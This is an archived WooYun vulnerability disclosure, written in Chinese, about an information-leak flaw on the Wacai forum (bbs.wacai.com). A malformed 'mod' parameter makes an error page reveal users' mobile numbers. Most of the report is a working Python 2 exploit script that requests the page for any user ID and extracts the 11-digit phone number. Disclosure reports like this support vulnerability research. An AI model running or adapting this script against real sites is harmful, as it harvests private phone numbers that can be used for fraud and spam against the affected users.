乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-19: 细节已通知厂商并且等待厂商处理中 2015-06-24: 厂商已经主动忽略漏洞,细节向公众公开
漏洞说小也小,说大也大,只要不被黑产牛利用一切都是好的,不然满屏诈骗信息...
废话不多说,直接上图
问题出在这个URL上面
http://bbs.wacai.com/home.php?mod=spacecp'&ac=poke&op=send&uid=3864222&handlekey=propokehk_3864222&infloat=yes&handlekey=a_poke_3864222&inajax=1&ajaxtarget=fwin_content_a_poke_3864222
mod=spacecp 后面随便加个符号 比如我这里加的单引号,会以内部错误的原因将页面返还,并且手机号也完整的显示出来了...
Exp:
# -*- coding: utf-8 -*-__author__ = 'SheepGuest'import reimport urllibimport urllib2#from sys import argvclass Wacai: def __init__(self,uid): self.url_headers = { 'User_Agent':'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Proxy-Connection':'keep-alive', 'Cache-Control':'max-age=0', 'Accept':'*/*', 'x-requested-with':'XMLHttpRequest', 'Accept-Language':'zh-cn', 'Referer':'http://bbs.wacai.com/home.php?mod=space&uid=' + str(uid) + '&do=profile.&from=space', } self.url = 'http://bbs.wacai.com/home.php' self.req = re.compile('<title>(\d{11}).*?</title>') def gethtml(self,uid): try: post_values = urllib.urlencode({ 'mod':'spacecp.','ac':'poke','op':'send','uid':str(uid),'handlekey':'propokehk_' + str(uid), 'infloat':'yes','handlekey':'a_poke_' + str(uid),'inajax':'1','ajaxtarget':'fwin_content_a_poke_' + str(uid), }) postdata = self.url + '?' + post_values request = urllib2.Request(postdata,data=None,headers=self.url_headers) response = urllib2.urlopen(request) return response.read().decode('utf-8') except urllib2.URLError, e: if hasattr(e,"reason"): print u"连接挖财网失败,错误原因",e.reason return None def getTel(self,response): try: result = re.search(self.req,response) result = result.group(1) print 'Tel is : %s' % result except AttributeError, e: print u"请输入正确的uid" return Noneif __name__ == '__main__': #script,uid = argv uid = raw_input('input uid:') if len(uid) > 7: print u"uid范围在 1 ~ 7 位" else: ptel = Wacai(uid) response = ptel.gethtml(uid) ptel.getTel(response)
上图测试下效果
过滤完整
危害等级:无影响厂商忽略
忽略时间:2015-06-24 08:32
漏洞Rank:15 (WooYun评价)
2015-06-24:感谢您的反馈,漏洞已紧急处理